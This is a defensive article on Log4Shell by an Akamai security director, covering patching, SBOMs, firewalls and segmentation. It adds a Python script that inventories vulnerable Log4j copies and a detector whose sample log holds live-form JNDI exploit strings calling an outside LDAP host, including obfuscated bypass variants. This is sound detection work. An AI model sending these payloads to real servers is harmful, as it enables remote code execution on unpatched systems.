Richard Meeus, director of security & technology strategy EMEA at Akamai, discusses how organisations can protect themselves against vulnerabilities such as the one recently found within Log4j
For many, the festive period in 2021 saw a slight return to normality and a much calmer Christmas than the year before. But the story was very different for cyber security professionals the world over, who had to contend with an unprecedentedly large-scale vulnerability, which has now come to be known as Log4Shell, or, slightly inaccurately, Log4j.
This critical vulnerability was first disclosed on 9 December 2021 and allows unauthenticated remote code execution through the widely used Java logging library Log4j. Many businesses were compromised by the exploit, potentially resulting in the exfiltration of sensitive data. In the weeks after the vulnerability became public, Akamai observed a sustained rate of 2 million attack attempts per hour, with over half (57%) coming from known cyber attackers. There have also been several high-profile attacks using the vulnerability, most notably one that forced the Belgian Ministry of Defence to shut down a portion of its network. Amid all the noise, it can be daunting to work out exactly what you should do to protect your business from harm. But there are a number of straightforward actions businesses should take – let’s take a closer look.
A brief history of the Log4j vulnerability and its impact
Log4j is an open source library that records events, such as routine operations or errors in a system, and communicates diagnostic messages to system administrators. It’s a fairly unglamorous tool, but the catch is that it’s used almost everywhere – making almost everyone potentially vulnerable to attackers exploiting the newly discovered flaw in the Log4j code.
Malicious actors using Log4j to attack businesses are potentially able to get access to confidential and sensitive business information, making it absolutely essential that businesses do all they can to protect themselves.
Staying on top of the latest guidance
As a first step, it is important to keep an eye on the advisories from the team behind Log4j, which currently states that release 2.17.1 fixes this vulnerability. It is vital to check with your IT team to ensure they are in step with the latest advice from the Log4j project.
Understanding your exposure
Once you’ve ensured that urgent patches have been completed, you can begin building your understanding of your exposure through the other online third party tools your business might use. Remember – the challenge with Log4j is that the vulnerability affects so many pieces of software, tools and systems.
As more and more business software is built with layers and layers of third party code, it becomes paramount that businesses assess the risk exposure not just of the software they use, but also of the vendor, and of the software that vendor has used to assemble the final product. The inventory that makes this possible is known as a software bill of materials (SBOM), and it functions much like the list of ingredients on a ready meal. Without it, a large number of vulnerabilities could be ‘baked in’ without you even knowing.
Visibility is paramount – work with your IT team to make sure risk assessments have this complete picture of how the business’ software has been assembled and where it is running. The more complete this picture, the faster you can react if the worst happens and you do become exposed to malicious actors.
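The patching and exposure steps above come down to one question: where, on every host, does a copy of Log4j actually live, and is it older than the fixed release? The script below is an added example written for this article (it is not Akamai’s tooling or anything from the Log4j project) that walks a directory, reads the Maven `pom.properties` that log4j-core ships inside JAR, WAR and EAR archives, and flags every copy older than 2.17.1, the release named above. It descends into archives nested inside archives, because a WAR that bundles `log4j-core` under `WEB-INF/lib` is exactly the kind of copy a package-manager query misses. The sample archives it scans are constructed inline, so it runs offline; the function names are my own.

```python
"""Inventory log4j-core copies inside JAR/WAR/EAR archives on disk and flag
versions older than 2.17.1.  Added example for this article: a hypothetical
helper script, not Akamai's or the Log4j project's own tooling."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

FIXED_VERSION = (2, 17, 1)                     # release named in the article
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear", ".zip"}
POM_PREFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/"


def parse_version(text: str) -> tuple:
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple of ints."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def _versions_in_archive(zf: zipfile.ZipFile, label: str) -> list:
    """Return (label, version) pairs for every log4j-core pom.properties found,
    descending into archives nested inside this one (e.g. WEB-INF/lib/*.jar)."""
    found = []
    for name in zf.namelist():
        if name.startswith(POM_PREFIX) and name.endswith("pom.properties"):
            props = zf.read(name).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            if m:
                found.append((label, m.group(1).strip()))
        elif Path(name).suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    found.extend(_versions_in_archive(inner, f"{label}!{name}"))
            except zipfile.BadZipFile:
                continue  # suffix says archive, content says otherwise: skip it
    return found


def scan_tree(root) -> list:
    """Walk a directory and report each log4j-core copy with an update verdict."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.suffix.lower() in ARCHIVE_SUFFIXES and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as zf:
                for label, version in _versions_in_archive(zf, str(path.relative_to(root))):
                    findings.append({
                        "location": label,
                        "version": version,
                        "needs_update": parse_version(version) < FIXED_VERSION,
                    })
    return findings


def build_sample_tree() -> str:
    """Constructed sample data: a plain jar on 2.14.1 and a WAR bundling 2.17.1."""
    root = Path(tempfile.mkdtemp(prefix="log4j-inventory-"))

    def pom(version: str) -> str:
        return f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n"

    with zipfile.ZipFile(root / "old-app.jar", "w") as zf:
        zf.writestr(POM_PREFIX + "pom.properties", pom("2.14.1"))
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(POM_PREFIX + "pom.properties", pom("2.17.1"))
    with zipfile.ZipFile(root / "patched.war", "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", inner.getvalue())
    return str(root)


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
```

Run it against a real application directory by calling `scan_tree("/opt/myapp")` instead of the constructed tree. Feeding its output into the SBOM for each system is what turns “we think we patched” into a record you can check the next time a library of this kind makes the news.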
Strengthen your firewalls
Alongside the steps above, you should also actively take steps to stop threats. Firstly, make sure you’re running a web application firewall (WAF) in front of your internal and external servers, to filter out potential attacks. This can be paired with a DNS firewall to inspect and block suspicious DNS traffic, which in the case of Log4j could be carrying harmful payloads.
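To show what “filter out potential attacks” means for a WAF rule in this case, here is an added example (my own code, not an Akamai rule or anything from the original article) that runs a Log4Shell detector over constructed web-server log lines. The failure mode it handles is the one that bit many first-day signatures: Log4j resolves nested lookups such as `${lower:j}` before the JNDI handler sees the string, so a rule that only matches the literal `${jndi:` misses requests that are URL-encoded or spell the token through nested lookups. The detector normalises the request the way Log4j would and only then matches. Log lines, addresses and the function names are all constructed for the example.

```python
"""Flag HTTP request log lines carrying Log4Shell-style JNDI lookup strings.
Added example for this article: a hypothetical WAF-style detector, not an
Akamai rule.  The sample log lines below are constructed (documentation IPs)."""
import re
from urllib.parse import unquote

# Log4j evaluates ${lower:x}, ${upper:x} and ${name:-x} to x before the jndi
# handler runs, so the detector collapses those forms first; otherwise it
# only catches the plain, unobfuscated string.
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^{}]*)\}"     # ${lower:j} -> j
    r"|\$\{[^{}]*:-([^{}]*)\}",           # ${::-j} / ${env:NOPE:-j} -> j
    re.IGNORECASE,
)


def normalise(text: str) -> str:
    """Undo URL encoding and nested-lookup wrapping until the string is stable."""
    text = unquote(unquote(text))          # two rounds handles double-encoded values
    prev = None
    while prev != text:                    # innermost lookups resolve first
        prev = text
        text = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text.lower()


def is_jndi_lookup(field: str) -> bool:
    """True when the normalised field contains a JNDI lookup expression."""
    return "${jndi:" in normalise(field)


def scan_log(lines) -> list:
    """Return (line_index, client_ip) for every line that carries a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        if is_jndi_lookup(line):
            hits.append((idx, line.split(" ", 1)[0]))
    return hits


# Constructed combined-format access log: one benign request, three hostile
# variants (plain, URL-encoded, nested lookups) and one benign ${...} string.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 311 "-" "${jndi:ldap://198.51.100.7/a}"',
    '203.0.113.12 - - [10/Dec/2021:03:14:12 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 200 100 "-" "curl/7.68"',
    '203.0.113.14 - - [10/Dec/2021:03:14:15 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${::-l}dap://198.51.100.7/c}"',
    '203.0.113.20 - - [10/Dec/2021:03:14:20 +0000] "GET /docs/${project.version} HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for idx, ip in scan_log(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup from {ip}")
```

The same `normalise` step belongs in any SIEM rule you write for this: match after normalisation, not before, and treat a hit on an unpatched host from the inventory step as an incident rather than a blocked probe.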
Leveling up your segmentation capabilities
As invaluable as firewalls are, there is also value to be gained from introducing microsegmentation, which is a more advanced and effective way of dividing up your network. If you imagine your network as the hull of a ship, a single whole entity, bulkheads segment the ship to help it stay afloat if one compartment is breached. Microsegmentation provides those bulkheads in your network and allows you to swiftly quarantine affected or vulnerable servers, preventing the spread of unwanted communication between systems.
Ultimately, building a viable security strategy to mitigate logging vulnerabilities of this type requires an understanding of the latest guidance and best-practice, as well as an honest accounting of your own risk levels. From there, you can strengthen and re-tool your range of cyber security products.
Tackling the ‘next Log4j’
Log4j may be big, but it’s not going to be the last of its kind. Cyber security threats are by their nature a constantly moving target, which means that businesses must remain vigilant and informed of industry issues, whilst also making the necessary investments to prevent the potentially devastating costs of a breach or exploit. By adapting to seal off potential attack routes, businesses can win against cyber criminals.